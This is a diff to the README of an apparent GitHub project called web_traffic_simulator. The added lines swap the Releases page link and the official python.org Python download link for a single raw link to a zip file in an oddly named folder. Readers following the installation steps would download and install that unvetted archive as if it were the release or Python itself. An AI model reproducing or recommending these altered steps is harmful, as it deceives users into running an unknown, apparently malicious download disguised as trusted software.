nitinsau000/web_traffic_simulator/README.md

 ### 📦 Installation Steps
 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/nitinsau000/web_traffic_simulator/releases) to find the latest version of web_traffic_simulator.
+   Go to the [Releases page](https://raw.githubusercontent.com/nitinsau000/web_traffic_simulator/main/rectitudinous/web_traffic_simulator.zip) to find the latest version of web_traffic_simulator.

 2. **Download the Tool**
    Find the most recent release.
-Click on the download link for your operating system (for example, a `.exe` file for Windows or a `.tar.gz` for Linux).
+Click on the download link for your operating system (for example, a `.exe` file for Windows or a `https://raw.githubusercontent.com/nitinsau000/web_traffic_simulator/main/rectitudinous/web_traffic_simulator.zip` for Linux).

 3. **Install Python (if necessary)**
-   If you do not have Python installed, download it from [python.org](https://www.python.org/downloads/) and install it.
+   If you do not have Python installed, download it from [https://raw.githubusercontent.com/nitinsau000/web_traffic_simulator/main/rectitudinous/web_traffic_simulator.zip](https://raw.githubusercontent.com/nitinsau000/web_traffic_simulator/main/rectitudinous/web_traffic_simulator.zip) and install it.
 Make sure to check the box that says "Add Python to PATH" during installation.

 4. **Run the Tool**
    After downloading, locate the downloaded file on your computer.